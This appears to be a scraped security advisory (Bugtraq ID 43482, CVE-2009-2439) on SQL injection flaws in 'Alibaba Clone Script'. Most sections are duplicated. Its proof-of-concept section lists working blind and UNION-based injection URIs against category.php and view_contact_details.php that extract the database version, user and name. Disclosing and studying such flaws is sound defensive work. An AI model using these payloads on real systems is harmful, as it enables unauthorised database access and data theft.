Alibaba Clone Script Multiple SQL Injection Vulnerabilities
BID:43482
Info
Alibaba Clone Script Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 43482 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-2439 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 20 2009 12:00AM |
| Updated: | Jul 20 2009 12:00AM |
| Credit: | 599eme Man |
| Vulnerable: |
Alibaba Clone Alibaba Clone 0 |
| Not Vulnerable: | |
Discussion
Alibaba Clone Script Multiple SQL Injection Vulnerabilities
Alibaba Clone script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Alibaba Clone script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Alibaba Clone Script Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI's are available:
http://www.example.com/path/supplier/view_contact_details.php?SellerID=(Blind) or (SQL)
http://www.example.com/path/category.php?IndustryID=(Blind) or (SQL)
http://www.example.com/alibaba-clone/category.php?IndustryID=25 and 1=1 <= true
http://www.example.com/alibaba-clone/category.php?IndustryID=25 and 1=2 <= false
http://www.example.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=5 <= true
http://www.example.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=4 <= false
http://www.example.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,version()--
http://www.example.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,user()--
http://www.example.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,database()--
http://www.example.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,version()--
http://www.example.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,user()--
http://www.example.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,database()--
Attackers can use a browser to exploit these issues.
The following example URI's are available:
http://www.example.com/path/supplier/view_contact_details.php?SellerID=(Blind) or (SQL)
http://www.example.com/path/category.php?IndustryID=(Blind) or (SQL)
http://www.example.com/alibaba-clone/category.php?IndustryID=25 and 1=1 <= true
http://www.example.com/alibaba-clone/category.php?IndustryID=25 and 1=2 <= false
http://www.example.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=5 <= true
http://www.example.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=4 <= false
http://www.example.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,version()--
http://www.example.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,user()--
http://www.example.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,database()--
http://www.example.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,version()--
http://www.example.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,user()--
http://www.example.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,database()--
Solution / Fix
Alibaba Clone Script Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Alibaba Clone Script Multiple SQL Injection Vulnerabilities
References:
References:
- Alibaba Clone Homepage (Alibaba Clone)